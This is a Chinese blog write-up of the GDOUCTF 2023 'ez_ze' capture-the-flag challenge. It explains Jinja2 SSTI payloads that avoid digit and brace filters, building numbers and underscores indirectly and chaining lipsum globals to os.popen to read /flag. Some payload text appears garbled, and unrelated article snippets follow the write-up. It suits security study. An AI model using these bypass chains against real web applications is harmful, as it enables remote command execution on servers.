当前位置: 首页 > article >正文

[GDOUCTF 2023]<ez_ze> SSTI 绕过数字与大括号过滤的实战技巧

1. SSTI注入基础与ez_ze题目背景SSTIServer-Side Template Injection服务器端模板注入是Web安全中常见的漏洞类型它允许攻击者通过构造恶意模板表达式在服务器端执行任意代码。在CTF竞赛中这类题目往往通过过滤关键字符来增加挑战难度。GDOUCTF 2023的ez_ze题目就是一个典型案例它过滤了数字和大括号这两个关键元素。传统SSTI利用通常依赖{{7*7}}这类表达式进行测试但当大括号被过滤时我们需要改用{%if 1%}test{%endif%}这类控制语句来探测漏洞。这道题的特殊之处在于它不仅过滤了{{}}还限制了数字的使用这就迫使我们寻找更隐蔽的字符构造方式。我最初尝试用{%print 123%}测试时发现数字被拦截但{%if not a%}yes{%endif%}这样的布尔判断却能正常执行。这个细节说明过滤规则可能存在逻辑漏洞也为后续绕过提供了突破口。在实际渗透测试中这种逐步试探过滤规则边界的方法非常关键。2. 绕过数字过滤的实战技巧当数字被完全过滤时我们需要通过字符运算动态生成所需数值。一个经典的技巧是利用字典键名长度统计功能{%set onedict(ca)|join|count%} {%set twodict(cca)|join|count%} {%set threedict(ccca)|join|count%}这种方法通过dict()创建包含N个字符的键再用join转换为字符串后count统计长度。比如dict(ccca)会生成{ccc:a}join后变成ccc其长度正好是3。通过这种方式我们可以构造出1-9的基础数字。在更复杂的场景中还可以通过算术运算生成更大数值。例如获取ASCII码95对应的下划线字符时{%set _(lipsum|string|list).pop(three*eight)%}这里three*eight就是3×824通过乘法运算定位到字符串中第24个字符通常是下划线。这种技巧在需要获取特殊字符时特别有用。3. 关键字符的替代获取方案当大括号和数字都被过滤时获取下划线这类关键字符就成为突破口。以获取__globals__为例我们可以分步拆解首先获取下划线字符{%set xiahuaxian(lipsum|string|list)|attr(pop)(three*eight)%}然后拼接目标字符串{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}这里利用lipsumFlask内置变量的字符串表示通过pop()方法提取特定位置的字符。我测试发现不同环境下字符位置可能变化所以实际操作时需要先输出完整列表确认位置。对于os模块的获取可以采用字符拼接{%set shelldict(oa,sb)|join%}这种方法将字母拆分到字典键值对中再合并完美避开了直接书写敏感词。类似的技巧也适用于获取popen等方法名{%set ppdict(poa,penb)|join%}4. 完整Payload的组装与执行将所有组件组合起来形成最终攻击链需要精心设计。以下是关键步骤获取__globals__引用{%set globals(xiahuaxian,xiahuaxian,dict(globalsa)|join,xiahuaxian,xiahuaxian)|join%}获取os模块{%set shelldict(oa,sb)|join%} {%set os_modulelipsum|attr(globals)|attr(get)(shell)%}构造命令执行方法{%set ppdict(poa,penb)|join%} {%set cmdchar(47)%2bchar(102)%2bchar(108)%2bchar(97)%2bchar(103)%} # /flag {%set resultos_module|attr(pp)(cmd)|attr(read)()%}其中命令字符串通过ASCII码拼接生成这是绕过字符过滤的终极方案。我在实际测试中发现有时需要先用__builtins__获取chr()函数{%set builtins(xiahuaxian,xiahuaxian,dict(builtinsa)|join,xiahuaxian,xiahuaxian)|join%} {%set char(lipsum|attr(globals))|attr(get)(builtins)|attr(get)(dict(chra)|join)%}5. 简化Payload的优化思路原始解法虽然完整但过于冗长。经过多次测试我总结出几个优化点使用config对象替代lipsum获取下划线{% set xhx(config|string|list).pop(18)%}合并字符获取步骤{% set cmd(dict(cata)|join, ,dict(flaga)|join)|join %}使用更简洁的属性访问方式{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}这种优化后的Payload原型其实是lipsum.__globals__[os].popen(cat flag).read()但通过层层封装完全避开了敏感字符的直接使用。在真实渗透测试中这种模块化思维能大大提高攻击效率。

相关文章:

[GDOUCTF 2023]<ez_ze> SSTI 绕过数字与大括号过滤的实战技巧

1. SSTI注入基础与ez_ze题目背景 SSTI(Server-Side Template Injection)服务器端模板注入是Web安全中常见的漏洞类型,它允许攻击者通过构造恶意模板表达式在服务器端执行任意代码。在CTF竞赛中,这类题目往往通过过滤关键字符来增加…...

RyTuneX深度实战:Windows系统性能调优与隐私保护最佳实践

RyTuneX深度实战:Windows系统性能调优与隐私保护最佳实践 【免费下载链接】RyTuneX RyTuneX is a cutting-edge optimizer built with the WinUI 3 framework, designed to amplify the performance of Windows devices. Crafted for both Windows 10 and 11. 项目…...

SeamlessM4T v2:如何突破语言障碍的5个实用技巧

SeamlessM4T v2:如何突破语言障碍的5个实用技巧 【免费下载链接】seamless-m4t-v2-large 项目地址: https://ai.gitcode.com/hf_mirrors/ai-gitcode/seamless-m4t-v2-large 想象一下这样的场景:你在参加一个国际会议,演讲者正在用你听…...

英特尔I350网卡PXE功能深度配置:从FLASH状态查询到端口精准控制

1. 英特尔I350网卡PXE功能基础认知 第一次接触服务器网卡PXE配置的朋友可能会觉得这是个"黑盒子"。其实简单来说,PXE(Preboot eXecution Environment)就是让计算机在没装系统的情况下,通过网络启动并安装操作系统的技术…...

从电商搜索到内容审核:微调后的Chinese-CLIP模型还能这么用?

从电商搜索到内容审核:微调后的Chinese-CLIP模型还能这么用? 当电商平台每天新增数百万商品时,如何快速识别违规商品图片?当社交媒体需要审核海量用户上传的图文内容时,如何高效判断图文匹配度?这些看似不同…...

BNO055传感器IIC地址冲突?手把手教你修改PS引脚配置

BNO055传感器I2C地址冲突解决方案:PS引脚配置实战指南 在机器人、无人机等需要多传感器协同工作的项目中,BNO055作为一款高性能9轴惯性测量单元(IMU)被广泛使用。但当多个BNO055传感器通过I2C总线连接时,默认地址冲突问题常常让开发者头疼不已…...

Captain AI帮你一次过审,上品不再被驳回!

Ozon上品审核驳回、上架后违规下架,是90%以上卖家都踩过的坑。很多卖家遇到上品问题,会用DeepSeek等通用AI查询规则,却往往因为信息滞后、规则解读错误,反复修改仍无法过审,白白错过新品流量黄金期。一、Captain AI能帮…...

Win10自带应用太多?3分钟教你用PowerShell精准卸载(附常用应用命令大全)

Win10系统精简指南:PowerShell精准卸载内置应用全攻略 每次打开开始菜单,那些从未使用过的内置应用图标是否让您感到烦躁?作为技术从业者,我们更希望拥有一个干净高效的工作环境。本文将带您深入探索PowerShell在Windows系统管理中…...

不花一分钱!用闲置电脑搭建永久Mac远程控制台(VNC+cpolar固定TCP教程)

零成本打造24小时在线的Mac远程开发环境 你是否有一台闲置的Mac电脑放在角落积灰?或者需要随时随地访问家里的开发环境?将旧Mac改造成全天候在线的远程工作站,不仅能充分利用闲置资源,还能为移动办公提供极大便利。本文将手把手教…...

Qwen3.5-9B效果展示:中文新闻事件抽取+时间线生成+关联人物图谱

Qwen3.5-9B效果展示:中文新闻事件抽取时间线生成关联人物图谱 1. 模型核心能力概览 Qwen3.5-9B是一款拥有90亿参数的开源大语言模型,在中文处理和多模态理解方面展现出卓越能力。这个模型特别适合处理复杂的文本分析任务,能够从海量信息中提…...

千问3.5-2B开源可部署:模型权重托管远端,升级只需替换配置不重拉镜像

千问3.5-2B开源可部署:模型权重托管远端,升级只需替换配置不重拉镜像 1. 模型概述 千问3.5-2B是Qwen系列中的小型视觉语言模型,具备图片理解与文本生成能力。这个开源模型特别适合需要快速部署视觉理解功能的开发者,它能够&…...

通信协议:那些让硬件“说话“的规则

通信协议:那些让硬件"说话"的规则硬件工程师每天都在和协议打交道——调SPI、写驱动、配CAN报文。但很多人对协议的理解停留在"查手册配寄存器"层面,没有建立起系统感。这篇文章试着把这个系统搭起来:从最基本的"01…...

别只知道微软和WPS!2026年这5款高效率办公软件,懂行的人都在用

日常办公里,我们几乎都离不开办公软件,不管是上班族写报告、做表格,还是学生党写论文整理资料,亦或是自由职业者处理各类文档,微软Office和WPS一直是大众默认的首选。然而,微软Office功能全面但软件体积大&…...

告别系统臃肿:Win11Debloat三步配置流程让Windows运行效率提升51%

告别系统臃肿:Win11Debloat三步配置流程让Windows运行效率提升51% 【免费下载链接】Win11Debloat A simple, lightweight PowerShell script that allows you to remove pre-installed apps, disable telemetry, as well as perform various other changes to declu…...

从数据到诊断:深度学习驱动下的多模态抑郁症识别技术全景

1. 抑郁症识别技术的现状与挑战 抑郁症被称为21世纪的"心灵感冒",全球约有3.5亿患者。传统诊断主要依赖医生问诊和量表评估,这种方式存在主观性强、耗时长的痛点。我在参与某三甲医院精神科数字化改造项目时,亲眼见证了一位资深医生…...

智能客服VS语音转写:不同场景下语音识别评估指标的选择指南

智能客服与语音转写:业务场景驱动的语音识别评估指标决策框架 当企业考虑部署语音识别系统时,技术团队常会抛出一堆专业术语:WER 15%、CER 8%、SER 22%...但对产品经理和解决方案架构师而言,这些数字背后意味着什么?选…...

除了Omnipeek,你的8812BU网卡还能怎么玩?Win10下的另类WiFi抓包与网络诊断实战

解锁Realtek 8812BU网卡的隐藏潜能:Windows 10下的WiFi抓包与网络诊断全攻略 当你手握一块Realtek 8812BU无线网卡时,可能只把它当作普通的网络连接工具。但实际上,这款硬件在Windows 10环境下可以变身为强大的网络诊断利器。本文将带你探索…...

探索固定翼无人机编队控制:从高效协同到PX4-Autopilot落地实践

探索固定翼无人机编队控制:从高效协同到PX4-Autopilot落地实践 【免费下载链接】PX4-Autopilot PX4 Autopilot Software 项目地址: https://gitcode.com/gh_mirrors/px/PX4-Autopilot PX4-Autopilot作为开源无人机飞控系统的核心框架,通过模块化设…...

安防相机WDR功能实测:逆光场景下如何拍清车牌和人脸?

安防相机WDR功能实战解析:逆光场景下的车牌与人脸清晰拍摄指南 停车场出入口的监控画面中,一辆黑色轿车缓缓驶过,阳光从车尾方向直射镜头,车牌区域瞬间变成一片刺眼的白光——这是安防工程中最令人头疼的逆光场景。现代宽动态范围…...

社交媒体数据采集难题?MediaCrawler让复杂任务变简单

社交媒体数据采集难题?MediaCrawler让复杂任务变简单 【免费下载链接】MediaCrawler-new 项目地址: https://gitcode.com/GitHub_Trending/me/MediaCrawler-new 在信息爆炸的数字时代,企业、研究机构和内容创作者常常需要从各大社交平台获取有价…...

CANTools:基于Python的多硬件CAN总线诊断与测试工具开发实践

1. 为什么你需要CANTools这个神器 第一次接触CAN总线开发时,我被动辄十几万的商用测试工具吓到了。作为汽车电子工程师,我们经常需要和ECU打交道,但传统工具的高昂成本让很多小团队望而却步。直到发现可以用Python开发自己的CAN工具&#xff…...

5分钟掌握Fideo:终极免费直播录制软件使用指南

5分钟掌握Fideo:终极免费直播录制软件使用指南 【免费下载链接】fideo-live-record A convenient live broadcast recording software! Supports Tiktok, Youtube, Twitch, Bilibili, Bigo!(一款方便的直播录制软件! 支持tiktok, youtube, twitch, 抖音,…...

测试文章标题最终版

测试文章内容这是一篇测试文章...

2026年局部放电检测技术:全场景应用效能分析与绝缘诊断演进报告

摘要在2026年全球能源互联网纵深发展的背景下,电力系统及关键基础设施的绝缘安全已由“被动响应”全面转向“主动预警”。局部放电(Partial Discharge, PD)检测作为绝缘诊断的“哨兵”技术,其在多元化场景中的表现已成为衡量电力运…...

三步实现电脑玩手游:QtScrcpy让你的手机秒变游戏主机

三步实现电脑玩手游:QtScrcpy让你的手机秒变游戏主机 【免费下载链接】QtScrcpy Android实时投屏软件,此应用程序提供USB(或通过TCP/IP)连接的Android设备的显示和控制。它不需要任何root访问权限 项目地址: https://gitcode.com/barry-ran/QtScrcpy …...

从零开始掌握drawio:免费开源绘图工具的全方位指南

1. 为什么你需要drawio这款绘图神器 第一次接触drawio是在三年前的一个项目会议上,当时团队需要快速绘制一套系统架构图。同事随手打开浏览器输入app.diagrams.net,五分钟内就搭建出了清晰的流程图框架。那一刻我才发现,原来专业绘图可以如此…...

PCB开窗技术:提升电流承载能力的关键工艺

1. PCB开窗技术解析:从概念到应用在PCB设计领域,"开窗"这个术语经常被经验丰富的工程师挂在嘴边,但对于刚入行的新手来说,这个看似简单的操作背后却蕴含着不少设计门道。作为一名有十年硬件设计经验的工程师&#xff0c…...

快速原型:用快马一键生成win11右键菜单传统样式恢复工具

快速原型:用快马一键生成win11右键菜单传统样式恢复工具 最近升级到Windows 11后,最让我不习惯的就是那个右键菜单了。新版的设计把所有选项都折叠起来,每次想找个功能还得点"显示更多选项",效率大打折扣。作为一个习惯…...

告别繁琐配置:用快马AI一键生成企业级gstack项目脚手架,效率提升300%

最近在帮公司搭建一个内部任务管理后台,技术选型上我们决定采用gstack(Next.js 14 TypeScript Tailwind CSS Prisma NextAuth)。本以为是个简单的初始化工作,结果光是配置各种工具和依赖就花了大半天时间。直到发现了InsCode(…...

告别手动配置:用快马AI生成openclaw自动化安装与环境管理脚本

作为一名经常需要配置各种开发环境的程序员,我深刻体会到手动安装工具的繁琐。最近在搭建一个爬虫项目时需要用到openclaw,发现传统安装方式存在几个明显的效率痛点: 版本查找耗时:需要反复在官网和文档间切换,确认最…...